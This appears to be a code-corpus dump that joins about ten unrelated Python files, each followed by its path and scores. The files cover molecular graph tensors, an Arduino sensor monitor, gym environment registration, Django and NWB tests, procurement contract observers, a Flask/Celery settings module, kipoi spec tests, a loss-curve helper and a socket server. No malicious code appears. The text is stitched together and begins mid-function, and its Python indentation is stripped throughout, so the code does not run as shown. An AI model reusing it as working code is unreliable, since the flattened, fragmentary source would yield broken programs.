args = value['args'] if 'args' in value else {}
self._make_edges(key, value['class'], **args)
else:
# Custom function/class here
args = value['args'] if 'args' in value else {}
value['class'](self, key=key, **args)
else:
raise TypeError(
"Method must be a dict of {'class' : callable function/class or identifier, \
                    'args' : {'value' : 0} }, with optional args but got",
value, "instead")
for key, value in state.items():
if isinstance(value, str):
self._make_state(key, value)
elif isinstance(value, dict):
if 'class' not in value:
raise ValueError(" 'class' method must be defined in", value)
if isinstance(value['class'], str):
args = value['args'] if 'args' in value else {}
self._make_state(key, value['class'], **args)
else:
# Custom function/class here
args = value['args'] if 'args' in value else {}
value['class'](self, key=key, **args)
else:
raise TypeError(
"Method must be a dict of {'class' : callable function/class or identifier, \
                    'args' : {'value' : 0} }, with optional args but got",
value, "instead")
return self
def to_tensor(self,
nodes=None,
edges=None,
state=None,
trafo_nodes=None,
trafo_edges=None,
trafo_state=None,
default_nodes=None,
default_edges=None,
default_state=None,
out_tensor=np.array
):
"""
Convert the nx graph into a dict of tensors which can be directly used for GCN.
The desired attributes must be given with a suitable conversion function plus default value.
Here, one can add also the type of tensor or one-Hot mappings etc. and its default/zero state,
if the attributes is not specified for a specific node/edge. The properties are always mapped to numpy arrays
and then converted to out_tensor.
Args:
nodes (list, optional): Nodes properties. Defaults to ['proton'].
edges (list, optional): Edge properties. Defaults to ['bond'].
state (list, optional): State Properties. Defaults to ['size'].
trafo_nodes (dict, optional): Transformation function for nodes. Defaults to np.array.
trafo_edges (dict, optional): Transformation function for edges. Defaults to np.array.
trafo_state (dict, optional): Transformation function for state. Defaults to np.array.
default_nodes (dict, optional): Zero Nodes properties. Defaults to np.array(0).
default_edges (dict, optional): Zero Edge properties. Defaults to np.array(0).
default_state (dict, optional): Zero State Properties. Defaults to np.array(0).
out_tensor (func) : Final Function for each node/edge/state. Default is np.array.
Returns:
dict: Graph tensors as dictionary.
"""
if nodes is None:
nodes = [self._mols_implemented[self.mol_type]['nodes'][0]]
if edges is None:
edges = [self._mols_implemented[self.mol_type]['edges'][0]]
if state is None:
state = [self._mols_implemented[self.mol_type]['state'][0]]
if trafo_nodes is None:
trafo_nodes = {}
if trafo_edges is None:
trafo_edges = {}
if trafo_state is None:
trafo_state = {}
if default_nodes is None:
default_nodes = {}
if default_edges is None:
default_edges = {}
if default_state is None:
default_state = {}
for x in nodes:
if x not in trafo_nodes:
trafo_nodes[x] = np.array
for x in edges:
if x not in trafo_edges:
trafo_edges[x] = np.array
for x in state:
if x not in trafo_state:
trafo_state[x] = np.array
for x in nodes:
if x not in default_nodes:
default_nodes[x] = np.array(0.0)
for x in edges:
if x not in default_edges:
default_edges[x] = np.array(0.0)
for x in state:
if x not in default_state:
default_state[x] = np.array(0.0)
outn = []
oute = []
outs = []
out_a = nx.to_numpy_array(self)
        node_idx = np.array(list(self.nodes), dtype=int)  # np.int was removed from modern NumPy
        edge_idx = np.array(list(self.edges), dtype=int)
for i in node_idx:
current_node = []
for key in nodes:
if key in self.nodes[i]:
current_node.append(trafo_nodes[key](self.nodes[i][key]))
else:
current_node.append(default_nodes[key])
outn.append(current_node)
outn = np.array(outn)
for i in edge_idx:
current_edge = []
for key in edges:
if key in self.edges[i]:
current_edge.append(trafo_edges[key](self.edges[i][key]))
else:
current_edge.append(default_edges[key])
oute.append(current_edge)
oute = np.array(oute)
for key in state:
if key in self._graph_state:
outs.append(trafo_state[key](self._graph_state[key]))
else:
outs.append(default_state[key])
outs = np.array(outs)
# Make un-directed and sort edges and edge_index
outei, oute = add_edges_reverse_indices(edge_idx,oute)
return {"nodes": out_tensor(outn),
"edges": out_tensor(oute),
"state": out_tensor(outs),
"adjacency": out_tensor(out_a),
"indices": out_tensor(outei)}
# m = rdkit.Chem.MolFromSmiles("CC=O")
# test = MolGraph(m)
# test.make()
# nx.draw(test, with_labels=True)
# out = test.to_tensor() | molreps/graph.py | 0.575111 | 0.367157 |
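The commented lines at the end of graph.py sketch the intended usage; expanded below into a runnable form, assuming RDKit is installed. The property names come straight from _mols_implemented above.
import rdkit.Chem
from molreps.graph import MolGraph

m = rdkit.Chem.MolFromSmiles("CC=O")  # acetaldehyde
g = MolGraph(m)
g.make(nodes=["AtomicNum", "IsAromatic"],   # per-atom attributes
       edges=["BondType"],                  # per-bond attributes
       state=["NumAtoms", "ExactMolWt"])    # whole-molecule attributes
tensors = g.to_tensor(nodes=["AtomicNum"], edges=["BondType"], state=["NumAtoms"])
print(tensors["nodes"].shape, tensors["indices"].shape)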
import os
import yaml
from pocs.utils.database import PanMongo
from pocs.utils.logger import get_root_logger
from pocs.utils.messaging import PanMessaging
from pocs.utils.rs232 import SerialData
from . import load_config
class ArduinoSerialMonitor(object):
"""
    Monitors the serial lines and tries to parse any data received
as JSON.
Checks for the `camera_box` and `computer_box` entries in the config
and tries to connect. Values are updated in the mongo db.
"""
def __init__(self, auto_detect=False, *args, **kwargs):
self.config = load_config()
self.logger = get_root_logger()
        assert 'environment' in self.config
        # plain string message: the original passed logger.warning(...) here, which
        # logged on every init and left None as the assertion message
        assert isinstance(self.config['environment'], dict), \
            "Environment config variable not set correctly. No sensors listed"
self.db = None
self.messaging = None
# Store each serial reader
self.serial_readers = dict()
if auto_detect:
for port_num in range(9):
port = '/dev/ttyACM{}'.format(port_num)
if os.path.exists(port):
self.logger.debug("Trying to connect on {}".format(port))
sensor_name = None
serial_reader = self._connect_serial(port)
num_tries = 5
self.logger.debug("Getting name on {}".format(port))
while num_tries > 0:
try:
data = serial_reader.get_reading()
except yaml.parser.ParserError:
pass
except AttributeError:
pass
else:
try:
if 'name' in data:
sensor_name = data['name']
num_tries = 0
except Exception as e:
self.logger.warning("Read on serial: {}".format(e))
num_tries -= 1
if sensor_name is not None:
self.serial_readers[sensor_name] = {
'reader': serial_reader,
}
else:
# Try to connect to a range of ports
for sensor_name in self.config['environment'].keys():
try:
port = self.config['environment'][sensor_name]['serial_port']
except TypeError:
continue
except KeyError:
continue
serial_reader = self._connect_serial(port)
self.serial_readers[sensor_name] = {
'reader': serial_reader,
'port': port,
}
def _connect_serial(self, port):
if port is not None:
self.logger.debug('Attempting to connect to serial port: {}'.format(port))
serial_reader = SerialData(port=port, threaded=False)
self.logger.debug(serial_reader)
try:
serial_reader.connect()
serial_reader.start()
except Exception as e:
self.logger.warning('Could not connect to port: {}'.format(port))
return serial_reader
def disconnect(self):
for sensor_name, reader_info in self.serial_readers.items():
reader = reader_info['reader']
reader.stop()
def send_message(self, msg, channel='environment'):
if self.messaging is None:
self.messaging = PanMessaging.create_publisher(6510)
self.messaging.send_message(channel, msg)
def capture(self, use_mongo=True, send_message=True):
"""
Helper function to return serial sensor info.
Reads each of the connected sensors. If a value is received, attempts
to parse the value as json.
Returns:
sensor_data (dict): Dictionary of sensors keyed by sensor name.
"""
sensor_data = dict()
# Read from all the readers
for sensor_name, reader_info in self.serial_readers.items():
reader = reader_info['reader']
# Get the values
self.logger.debug("Reading next serial value")
try:
sensor_info = reader.get_reading()
except IndexError:
continue
time_stamp = sensor_info[0]
sensor_value = sensor_info[1]
try:
self.logger.debug("Got sensor_value from {}".format(sensor_name))
                data = yaml.safe_load(sensor_value.replace('nan', 'null'))  # safe_load: no arbitrary object construction
data['date'] = time_stamp
sensor_data[sensor_name] = data
if send_message:
self.send_message({'data': data}, channel='environment')
            except (yaml.YAMLError, ValueError, TypeError):
                self.logger.warning("Bad JSON: {0}".format(sensor_value))
            except Exception as e:
                self.logger.warning("Error parsing {0}: {1}".format(sensor_value, e))
if use_mongo and len(sensor_data) > 0:
if self.db is None:
self.db = PanMongo()
self.logger.info('Connected to PanMongo')
self.db.insert_current('environment', sensor_data)
else:
self.logger.debug("No sensor data received")
        return sensor_data | peas/sensors.py | 0.573081 | 0.288851 |
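A quick way to exercise the monitor without touching Mongo, assuming an Arduino is attached on one of the /dev/ttyACM* ports scanned above:
from peas.sensors import ArduinoSerialMonitor

monitor = ArduinoSerialMonitor(auto_detect=True)
data = monitor.capture(use_mongo=False, send_message=False)
for name, reading in data.items():
    print(name, reading.get('date'))
monitor.disconnect()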
import importlib
from inspect import getmembers
from pathlib import Path
import gym
def _get_envs(foldername=None, env_prefix=None, allow_list=None):
"""A helper function to get all environments in a folder.
Example usage:
_get_envs(foldername=None, env_prefix=None)
_get_envs(foldername='contrib', env_prefix='contrib')
The results still need to be manually cleaned up, so this is just a helper
Args:
foldername: str or None. If str, in the form of contrib, etc.
env_prefix: str or None, if not None, add this prefix to all env ids
        allow_list: list of allowed env names, for manual curation
"""
if env_prefix is None:
env_prefix = ''
else:
if env_prefix[-1] != '.':
env_prefix = env_prefix + '.'
if allow_list is None:
allow_list = list()
# Root path of ngym_shaping.envs folder
env_root = Path(__file__).resolve().parent
lib_root = 'ngym_shaping.envs.'
if foldername is not None:
env_root = env_root / foldername
lib_root = lib_root + foldername + '.'
# Only take .py files
files = [p for p in env_root.iterdir() if p.suffix == '.py']
# Exclude files starting with '_'
files = [f for f in files if f.name[0] != '_']
filenames = [f.name[:-3] for f in files] # remove .py suffix
filenames = sorted(filenames)
env_dict = {}
for filename in filenames:
# lib = 'ngym_shaping.envs.collections.' + l
lib = lib_root + filename
module = importlib.import_module(lib)
for name, val in getmembers(module):
if name in allow_list:
env_dict[env_prefix + name + '-v0'] = lib + ':' + name
return env_dict
NATIVE_ALLOW_LIST = ['DR_stage']
ALL_NATIVE_ENVS = _get_envs(foldername=None, env_prefix=None,
allow_list=NATIVE_ALLOW_LIST)
ALL_EXTENDED_ENVS = ALL_NATIVE_ENVS
def all_envs(tag=None, psychopy=False, contrib=False, collections=False):
"""Return a list of all envs in ngym_shaping."""
envs = ALL_NATIVE_ENVS.copy()
env_list = sorted(list(envs.keys()))
if tag is None:
return env_list
else:
if not isinstance(tag, str):
raise ValueError('tag must be str, but got ', type(tag))
new_env_list = list()
for env in env_list:
from_, class_ = envs[env].split(':')
imported = getattr(__import__(from_, fromlist=[class_]), class_)
env_tag = imported.metadata.get('tags', [])
if tag in env_tag:
new_env_list.append(env)
return new_env_list
def all_tags():
return ['confidence', 'context dependent', 'continuous action space',
'delayed response', 'go-no-go', 'motor', 'perceptual', 'reaction time',
'multidimensional action space', 'n-alternative', 'two-alternative',
'steps action space', 'supervised', 'timing', 'value-based',
'working memory']
def _distance(s0, s1):
# Copyright (c) 2018 luozhouyang
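    # Levenshtein edit distance, e.g. _distance('kitten', 'sitting') == 3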
if s0 is None:
raise TypeError("Argument s0 is NoneType.")
if s1 is None:
raise TypeError("Argument s1 is NoneType.")
if s0 == s1:
return 0.0
if len(s0) == 0:
return len(s1)
if len(s1) == 0:
return len(s0)
v0 = [0] * (len(s1) + 1)
v1 = [0] * (len(s1) + 1)
for i in range(len(v0)):
v0[i] = i
for i in range(len(s0)):
v1[0] = i + 1
for j in range(len(s1)):
cost = 1
if s0[i] == s1[j]:
cost = 0
v1[j + 1] = min(v1[j] + 1, v0[j + 1] + 1, v0[j] + cost)
v0, v1 = v1, v0
return v0[len(s1)]
def make(id, **kwargs):
try:
return gym.make(id, **kwargs)
except gym.error.UnregisteredEnv:
        all_ids = [env.id for env in gym.envs.registry.all()]
        dists = [_distance(id, env_id) for env_id in all_ids]
        # Python argsort
        sort_inds = sorted(range(len(dists)), key=dists.__getitem__)
        env_guesses = [all_ids[i] for i in sort_inds[:5]]  # slicing stays safe when fewer than 5 envs exist
err_msg = 'No registered env with id: {}.\nDo you mean:\n'.format(id)
for env_guess in env_guesses:
err_msg += ' ' + env_guess + '\n'
raise gym.error.UnregisteredEnv(err_msg)
_all_gym_envs = [env.id for env in gym.envs.registry.all()]
def register(id, **kwargs):
if id not in _all_gym_envs:
gym.envs.registration.register(id=id, **kwargs)
for env_id, entry_point in ALL_EXTENDED_ENVS.items():
register(id=env_id, entry_point=entry_point) | ngym_shaping/envs/registration.py | 0.581065 | 0.209227 |
from unittest.mock import patch
from django.test import TestCase
from django.contrib.auth import get_user_model
from core import models
def sample_user(email='<EMAIL>', password='<PASSWORD>'):
"""Create a sample user"""
return get_user_model().objects.create_user(email, password)
class ModelTests(TestCase):
def test_create_user_with_email_successful(self):
"""Test creating a new user with an email successful"""
email = '<EMAIL>'
password = '<PASSWORD>'
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password(password))
def test_new_user_email_normalized(self):
"""Test the new email for a user is normalized"""
email = '<EMAIL>'
user = get_user_model().objects.create_user(email, 'test123')
self.assertEqual(user.email, email.lower())
def test_new_user_invalid_email(self):
"""Test creating user with no email raises error"""
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, 'test123')
def test_create_new_super_user(self):
"""Test creating a new superuser"""
user = get_user_model().objects.create_superuser(
'<EMAIL>',
'test123'
)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff)
def test_category_str(self):
"""Test the category string representation"""
category = models.Category.objects.create(
user=sample_user(),
name='Test Category'
)
self.assertEqual(str(category), category.name)
def test_work_str(self):
"""Test the work string representation"""
work = models.Work.objects.create(
user=sample_user(),
title='Fountain of Wisdom',
)
self.assertEqual(str(work), work.title)
@patch('uuid.uuid4')
def test_work_file_name_uuid(self, mock_uuid):
"""Test that image is saved in the correct location"""
uuid = 'test-uuid'
mock_uuid.return_value = uuid
file_path = models.work_image_file_path(None, 'myimage.jpg')
exp_path = f'uploads/work/{uuid}.jpg'
self.assertEqual(file_path, exp_path) | app/core/tests/test_models.py | 0.72027 | 0.38523 |
import unittest
from datetime import datetime
import numpy as np
from dateutil.tz import tzlocal
from nwbwidgets.utils.units import get_min_spike_time, align_by_trials, align_by_time_intervals
from pynwb import NWBFile
from pynwb.epoch import TimeIntervals
class ShowPSTHTestCase(unittest.TestCase):
def setUp(self):
start_time = datetime(2017, 4, 3, 11, tzinfo=tzlocal())
create_date = datetime(2017, 4, 15, 12, tzinfo=tzlocal())
self.nwbfile = NWBFile(session_description='NWBFile for PSTH',
identifier='NWB123',
session_start_time=start_time,
file_create_date=create_date)
self.nwbfile.add_unit_column('location', 'the anatomical location of this unit')
self.nwbfile.add_unit_column('quality', 'the quality for the inference of this unit')
self.nwbfile.add_unit(id=1, spike_times=[2.2, 3.0, 4.5],
obs_intervals=[[1, 10]], location='CA1', quality=0.95)
self.nwbfile.add_unit(id=2, spike_times=[2.2, 3.0, 25.0, 26.0],
obs_intervals=[[1, 10], [20, 30]], location='CA3', quality=0.85)
self.nwbfile.add_unit(id=3, spike_times=[1.2, 2.3, 3.3, 4.5],
obs_intervals=[[1, 10], [20, 30]], location='CA1', quality=0.90)
self.nwbfile.add_trial_column(name='stim', description='the visual stimuli during the trial')
self.nwbfile.add_trial(start_time=0.0, stop_time=2.0, stim='person')
self.nwbfile.add_trial(start_time=3.0, stop_time=5.0, stim='ocean')
self.nwbfile.add_trial(start_time=6.0, stop_time=8.0, stim='desert')
def test_get_min_spike_time(self):
assert get_min_spike_time(self.nwbfile.units) == 1.2
def test_align_by_trials(self):
compare_to_at = [np.array([2.2, 3.0, 25.0, 26.0]), np.array([-0.8, 0., 22., 23.]),
np.array([-3.8, -3., 19., 20.])]
at = align_by_trials(self.nwbfile.units, index=1, before=20., after=30.)
np.testing.assert_allclose(at, compare_to_at, rtol=1e-02)
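# The expected rows above are simply spike_time - trial_start for unit 2's
# spikes [2.2, 3.0, 25.0, 26.0] against the trial starts [0.0, 3.0, 6.0]
# (inferred from the fixture built in setUp).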
def test_align_by_time_intervals_Nonetrials_select(self):
time_intervals = TimeIntervals(name='Test Time Interval')
time_intervals.add_interval(start_time=21.0, stop_time=28.0)
time_intervals.add_interval(start_time=22.0, stop_time=26.0)
time_intervals.add_interval(start_time=22.0, stop_time=28.4)
ati = align_by_time_intervals(self.nwbfile.units, index=1, intervals=time_intervals,
stop_label=None, before=20., after=30.)
compare_to_ati = [np.array([-18.8, -18., 4., 5.]), np.array([-19.8, -19., 3., 4.]),
np.array([-19.8, -19., 3., 4.])]
np.testing.assert_array_equal(ati, compare_to_ati)
def test_align_by_time_intervals(self):
time_intervals = TimeIntervals(name='Test Time Interval')
time_intervals.add_interval(start_time=21.0, stop_time=28.0)
time_intervals.add_interval(start_time=22.0, stop_time=26.0)
time_intervals.add_interval(start_time=22.0, stop_time=28.4)
ati = align_by_time_intervals(self.nwbfile.units, index=1, intervals=time_intervals,
stop_label=None, before=20., after=30., rows_select=[0, 1])
compare_to_ati = [np.array([-18.8, -18., 4., 5.]), np.array([-19.8, -19., 3., 4.])]
np.testing.assert_array_equal(ati, compare_to_ati) | nwbwidgets/test/test_utils_units.py | 0.59514 | 0.436142 |
from openprocurement_client.exceptions import (
ResourceNotFound,
)
from openprocurement.caravan.observers.base_observer import (
BaseObserverObservable,
ObserverObservableWithClient,
)
from openprocurement.caravan.observers.constants import (
CONTRACT_STATUS_MAPPING,
LOT_CONTRACT_TERMINAL_STATUSES,
)
from openprocurement.caravan.utils import (
search_lot_contract_by_related_contract, LOGGER
)
from openprocurement.caravan.observers.errors import (
LOT_CONTRACT_NOT_FOUND,
)
from openprocurement.caravan.constants import (
PATCH_LOT_CONTRACT_MSG,
LOT_OR_CONTRACT_NOT_FOUND_MSG,
SEARCH_LOT_CONTRACT_MSG
)
class LotContractChecker(ObserverObservableWithClient):
"""Adds lot's status to received message"""
def _activate(self, message):
if not message.get('error'):
return True
def _run(self, message):
LOGGER.info(
"Searching lot %s for contract related to %s contract",
message['lot_id'],
message['contract_id'],
extra={'MESSAGE_ID': SEARCH_LOT_CONTRACT_MSG}
)
lot_contract = None
try:
lot_contract = self._check_lot_contract(message)
except ResourceNotFound:
LOGGER.warning("Related contract not found: HTTP 404 error on the Lot resource")
result = self._prepare_error_message(LOT_CONTRACT_NOT_FOUND, message)
else:
if lot_contract is None: # contract not found
LOGGER.warning(
"Related contract not found: Lot model has not contract related to %s",
message['contract_id'],
)
return
LOGGER.info("Found %s contract", lot_contract.id)
result = self._prepare_message(lot_contract, message)
self._notify_observers(result)
def _check_lot_contract(self, message):
return search_lot_contract_by_related_contract(
self.client,
message['lot_id'],
message['contract_id']
)
def _prepare_message(self, lot_contract, recv_message):
recv_message.update({
'lot_contract_status': lot_contract.status,
'lot_contract_id': lot_contract.id
})
return recv_message
def _prepare_error_message(self, error, in_message):
if error == LOT_CONTRACT_NOT_FOUND:
in_message.update({'error': LOT_CONTRACT_NOT_FOUND})
return in_message
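# Illustrative pipeline (hypothetical wiring; the actual composition lives
# elsewhere in the package): a LotContractChecker emits a message that the
# LotContractPatcher below handles for live contracts, while
# LotContractAlreadyCompleteHandler and LotContractNotFoundHandler consume the
# terminal-status and not-found cases respectively.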
class LotContractPatcher(ObserverObservableWithClient):
def _activate(self, message):
if (
not message.get('error')
# skip already finished contracts
and not (message['lot_contract_status'] in LOT_CONTRACT_TERMINAL_STATUSES)
):
return True
def _run(self, message):
LOGGER.info(
"Patching lot contract %s of lot %s",
message['lot_contract_id'],
message['lot_id'],
extra={'MESSAGE_ID': PATCH_LOT_CONTRACT_MSG}
)
lot_contract = self._patch_lot_contract(message)
out_message = self._prepare_message(lot_contract, message)
self._notify_observers(out_message)
def _patch_lot_contract(self, message):
target_lot_contract_status = CONTRACT_STATUS_MAPPING.get(message['contract_status'])
contract = self.client.patch_contract(
message['lot_id'],
message['lot_contract_id'],
None,
{"data": {"status": target_lot_contract_status}}
)
return contract
def _prepare_message(self, lot_contract, recv_message):
recv_message.update({
'lot_contract_status': lot_contract.data.status
})
return recv_message
class LotContractAlreadyCompleteHandler(BaseObserverObservable):
def _activate(self, message):
if (
message.get('lot_contract_status') in LOT_CONTRACT_TERMINAL_STATUSES
):
return True
def _run(self, message):
LOGGER.info(
'Contract %s of lot %s is already in terminal status %s',
message['lot_contract_id'],
message['lot_id'],
message['lot_contract_status']
)
self._notify_observers(message)
class LotContractNotFoundHandler(BaseObserverObservable):
def _activate(self, message):
if (
message.get('error') == LOT_CONTRACT_NOT_FOUND
):
return True
def _run(self, message):
LOGGER.error(
"Lot {0} or some it's subresource {1} not found".format(
message['lot_id'],
message.get('lot_contract_id', '<Not Found>')
),
extra={'MESSAGE_ID': LOT_OR_CONTRACT_NOT_FOUND_MSG}
) | openprocurement/caravan/observers/lot.py | 0.446495 | 0.085939 |
import os
basedir = os.path.abspath(os.path.dirname(__file__))
VERSION = '0.1'
URL_PREFIX_VERSION = '/api'
GEO_FILE = 'logtoes/geocity/GeoLiteCity.dat'
HOST = 'localhost'
PORT = 5555
DEBUG = True
BRANCH = 'master'
TRAP_HTTP_EXCEPTIONS = True
TRAP_BAD_REQUEST_ERRORS = True
JSONIFY_PRETTYPRINT_REGULAR = True
ERROR_404_HELP = False
ERROR_TO_FILE = True
ERROR_LOG_NAME = 'logs/errors.log'
CELERY_BROKER_URL = ['redis://localhost:6379/0']
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERYD_LOG_FILE = "logs/celery.log"
CELERY_IGNORE_RESULT = False
CELERY_TASK_RESULT_EXPIRES = 3600
CELERY_ENABLE_UTC = True
CELERY_DEFAULT_ROUTING_KEY = "logtoes"
CELERY_DEFAULT_QUEUE = 'logtoes'
CELERY_DEFAULT_EXCHANGE = "logtoes"
CELERY_DEFAULT_EXCHANGE_TYPE = "direct"
CELERY_DISABLE_RATE_LIMITS = True
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
BROKER_TRANSPORT_OPTIONS = {'fanout_prefix': True}
BROKER_CONNECTION_MAX_RETRIES = 0
BROKER_FAILOVER_STRATEGY = "round-robin"
BROKER_HEARTBEAT = 10
FIREHOSE_STREAM = 'logtofirehose'
FIREHOSE_ENABLED = True
ELASTICSEARCH_URL = 'elastic'
ELASTICSEARCH_PORT = 9200
ELASTICSEARCH_INDEX = 'logtoes'
ELASTICSEARCH_MAPPING = 'logtoes'
ELASTICSEARCH_ENABLED = True
ELASTICSEARCH_SETTINGS = {
"settings": {
"index": {
"number_of_shards": 3,
"number_of_replicas": 0
}
},
"mappings": {
"api_requests": {
"properties": {
"@timestamp": {
"type": "date"
},
"ip": {
"type": "ip"
},
"location": {
"type": "geo_point"
},
"country": {
"type": "multi_field",
"fields": {
"country": {"type": "string", "index": "analyzed"},
"untouched": {"type": "string", "index": "not_analyzed"}
}
},
"user": {
"type": "string"
},
"request": {
"type": "multi_field",
"fields": {
"request": {"type": "string", "index": "analyzed"},
"untouched": {"type": "string", "index": "not_analyzed"}
}
},
"status code": {
"type": "integer"
},
"query": {
"type": "string"
},
"agent": {
"type": "multi_field",
"fields": {
"agent": {"type": "string", "index": "analyzed"},
"untouched": {"type": "string", "index": "not_analyzed"}
}
},
"raw agent": {
"type": "multi_field",
"fields": {
"raw agent": {"type": "string", "index": "analyzed"},
"untouched": {"type": "string", "index": "not_analyzed"}
}
}
}
}
}
}
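# Illustrative consumption of these defaults (assumed usage, not part of this
# file): Flask apps typically load a settings module like this one via
#
#     from flask import Flask
#     app = Flask(__name__)
#     app.config.from_object('logtoes.default_settings')
#     app.config['ELASTICSEARCH_PORT']  # -> 9200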
try:
from local_settings import *
except ImportError:
pass
try:
from settings import *
except ImportError:
pass | logtoes/default_settings.py | 0.164416 | 0.149097 |
import os
import pytest
import six
from pytest import raises
from kipoi.specs import DataLoaderDescription, example_kwargs, RemoteFile
from related import from_yaml
# Class to test
CLS = DataLoaderDescription
# common header
inp_targ = """
"""
GOOD_EXAMPLES = ["""
type: Dataset
defined_as: dataloader.py::SeqDistDataset
args:
intervals_file:
doc: tsv file with `chrom start end id score strand`
example:
url: https://github.com/kipoi/kipoi/raw/f86a2162d15c92e72adeae2988bd1757732c79b0/example/models/rbp/example_files/intervals.tsv
md5: 3be79e1757422fdaa337cdcde8a7b8bc
type: str
fasta_file:
doc: Reference genome sequence
example: genome.fa
gtf_file:
doc: file path; Genome annotation GTF file pickled using pandas.
example: gtf.gtf
preproc_transformer:
doc: path to the serialized transformer used for pre-processing.
example: path.transformer
target_file:
doc: path to the targets (txt) file
optional: True # use the same semantics as for the CLI interface?
info:
authors:
- name: <NAME>
name: rbp_eclip
version: 0.1
doc: RBP binding prediction
output_schema:
inputs:
seq:
shape: (4, 101)
special_type: DNASeq
doc: One-hot encoded RNA sequence
associated_metadata: ranges
dist_polya_st:
shape: (1, 10)
doc: Distance to poly-a site transformed with B-splines
targets:
binding_site:
shape: (1, )
doc: Measured binding strength
metadata:
ranges:
chr:
type: str
doc: Chromosome
start:
type: int
doc: Start position
end:
type: int
doc: End position
id:
type: str
doc: Id of the sequence
strand:
type: str
doc: Sequence strand
"""]
BAD_EXAMPLES = ["""
type: keras
args:
arch: model/model.json
weights: model/weights.h5
custom_objects: model/custom_keras_objects.py
default_dataloader: dataloader.yaml # shall we call it just dataloader?
# info is missing
output_schema:
inputs:
seq:
shape: (4, 101)
special_type: DNASeq
doc: One-hot encoded RNA sequence
dist_polya_st:
shape: (None, 1, 10)
doc: Distance to poly-a site transformed with B-splines
targets:
binding_site:
shape: (1, )
doc: Predicted binding strength
"""]
@pytest.mark.parametrize("info_str", GOOD_EXAMPLES)
def test_parse_correct_info(info_str, tmpdir):
info_str = inp_targ + info_str # add the input: targets headers
# loading works
info = CLS.from_config(from_yaml(info_str))
info.path = str(tmpdir)
outfiles = example_kwargs(info.args, str(tmpdir))
assert os.path.exists(outfiles['intervals_file'])
assert isinstance(info.get_example_kwargs(), dict)
assert isinstance(example_kwargs(info.args), dict)
assert isinstance(info.args["intervals_file"].example, RemoteFile)
assert isinstance(info.args["fasta_file"].example, str)
# cfg works
cfg = info.get_config()
info2 = CLS.from_config(cfg)
assert str(info) == str(info2)
@pytest.mark.parametrize("info_str", BAD_EXAMPLES)
def test_parse_bad_info(info_str):
info_str = inp_targ + info_str # add the input: targets headers
bim = from_yaml(info_str)
with raises(Exception):
CLS.from_config(bim)
# --------------------------------------------
# load example yaml files
KERAS_EXAMPLES_TO_LOAD = ["rbp", "extended_coda"]
@pytest.mark.parametrize("example", KERAS_EXAMPLES_TO_LOAD)
def test_model_loading_on_examples(example):
"""Test extractor
"""
model_file = "example/models/{0}/dataloader.yaml".format(example)
dl = DataLoaderDescription.load(model_file)
# check that all the fields exist
assert dl.type == "Dataset"
dl.defined_as
dl.args
arg_elem = six.next(six.itervalues(dl.args))
arg_elem.doc
arg_elem.type
arg_elem.optional
dl.info
dl.info.authors
dl.info.name
dl.info.version
dl.info.tags
dl.info.doc
dl.output_schema
dl.output_schema.inputs
inp_elem = six.next(six.itervalues(dl.output_schema.inputs))
inp_elem.shape
inp_elem.special_type
inp_elem.associated_metadata
dl.output_schema.targets
dl.output_schema.metadata | tests/specs/parsing/test_027_parsing_DataLoaderDescription.py | 0.729327 | 0.458106 |
import os
from anycurve import losscurve
class a2v_curve:
def __init__(self, cfg):
self.cfg = cfg
self.curve = self.setup()
def setup(self):
loss_curve_dir = os.path.join(self.cfg.LOG_DIR, 'loss_curve_db')
loss_curve = losscurve(db_path=loss_curve_dir, db_name='data', figsize=(20, 12))
loss_curve.add_key('loss')
if len(self.cfg.MODEL.MODULE_TRAINED) == 1 and self.cfg.MODEL.MODULE_TRAINED[0] != 'verb':
loss_curve.add_key('{:s}_map_w_no_interaction'.format(self.cfg.MODEL.MODULE_TRAINED[0]))
loss_curve.add_key('{:s}_map_wo_no_interaction'.format(self.cfg.MODEL.MODULE_TRAINED[0]))
else:
loss_curve.add_key('pasta_map')
loss_curve.add_key('verb_map')
loss_curve.set_xlabel('iteration')
loss_curve.set_ylabel('loss', False)
loss_curve.set_ylabel('mAP', True)
loss_curve.daemon(True, self.cfg.TRAIN.SHOW_INTERVAL // self.cfg.TRAIN.DISPLAY_INTERVAL)
return loss_curve
def log(self, feed_dict):
self.curve.log(feed_dict)
def render(self):
if self.curve.daemon():
self.curve.clean()
self.curve.draw('iteration', 'loss', self.cfg.MODEL_NAME + '_loss')
self.curve.twin()
self.curve.clean()
if len(self.cfg.MODEL.MODULE_TRAINED) == 1 and self.cfg.MODEL.MODULE_TRAINED[0] != 'verb':
self.curve.draw('iteration', '{:s}_map_w_no_interaction'.format(self.cfg.MODEL.MODULE_TRAINED[0]), self.cfg.MODEL_NAME + '_' + self.cfg.MODEL.MODULE_TRAINED[0] + '_w_nointer')
self.curve.draw('iteration', '{:s}_map_wo_no_interaction'.format(self.cfg.MODEL.MODULE_TRAINED[0]), self.cfg.MODEL_NAME + '_' + self.cfg.MODEL.MODULE_TRAINED[0] + '_wo_nointer')
else:
self.curve.draw('iteration', 'pasta_map', self.cfg.MODEL_NAME + '_pasta')
self.curve.draw('iteration', 'verb_map', self.cfg.MODEL_NAME + '_verb')
self.curve.twin()
self.curve.reset_choice()
self.curve.legend(inside=False)
self.curve.synchronize()
self.curve.render(os.path.join(self.cfg.LOG_DIR, 'curve.png')) | activity2vec/ult/visualize.py | 0.818338 | 0.084531 |
import socket
import select
import queue as Queue
from request import Request
from response import Response, DefaultResponse
class Server:
# NOTE: class-level attributes, shared by every Server instance
inputs = []
outputs = []
messages = {}
routes = {}
donotkill = False
def __init__(self,port=2145):
self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.sock.bind(('',port))
self.sock.listen(50)
self.sock.setblocking(0)
self.inputs.append(self.sock)
def handle_new_connection(self):
conn, addr = self.sock.accept()
conn.setblocking(0)
self.inputs.append(conn)
self.messages[conn] = Queue.Queue()
def handle_new_readable(self,conn):
data = conn.recv(60000)
if not data:
return self.remove_connection(conn)
request = Request(data.decode())
self.messages[conn].put(self.answer(request))
if conn not in self.outputs:
self.outputs.append(conn)
def remove_connection(self,conn):
if conn in self.outputs:
self.outputs.remove(conn)
self.inputs.remove(conn)
conn.close()
del self.messages[conn]
def handle_readables(self,conn):
if conn is self.sock:
self.handle_new_connection()
else:
self.handle_new_readable(conn)
